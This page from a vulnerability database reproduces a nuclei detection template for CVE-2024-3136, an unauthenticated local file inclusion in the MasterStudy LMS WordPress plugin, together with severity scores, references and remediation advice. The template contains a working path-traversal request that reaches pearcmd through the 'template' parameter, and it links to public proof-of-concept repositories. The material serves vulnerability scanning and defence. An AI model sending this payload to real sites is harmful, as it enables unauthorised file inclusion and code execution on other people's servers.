Lucene search
K

MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template

🗓️ 20 Jun 2026 03:02:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 128 Views

MasterStudy LMS plugin for WordPress <= 3.3.3 Local File Inclusion via template paramete

Related
Refs
Code
id: CVE-2024-3136

info:
  name: MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where  images and other "safe" file types can be uploaded and included.
  impact: |
    An attacker can read sensitive files, execute arbitrary code, or escalate privileges.
  remediation: |
    Upgrade MasterStudy LMS to version 3.3.4 or higher to mitigate the vulnerability.
  reference:
    - https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php
    - https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve
    - https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3136
    epss-score: 0.05018
    epss-percentile: 0.91144
    cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system"
    product: masterstudy_lms
    vendor: stylemixthemes
  tags: cve,cve2024,wp,wordpress,unauth,lfi,vuln
variables:
  randomstr: "{{randstr_1}}"
  marker: "{{base64(randomstr)}}"

http:
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=stm_lms_load_content&nonce={{nonce}}&

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(body_2),"config-create: must have 2 parameters")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - '"load_content":"(\w+?)"'
        group: 1
        internal: true
        name: nonce
# digest: 4a0a00473045022000f9d9bb06b3cdeb0d4878013c045f099276550c9fff2dbf7a8cdc85dc216990022100a9c1bb1bea834ff6567d25cc12d01ddaabb7ef491238318ec4baf7cd1fc9c843:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 3.19.8
EPSS0.05018
SSVC
128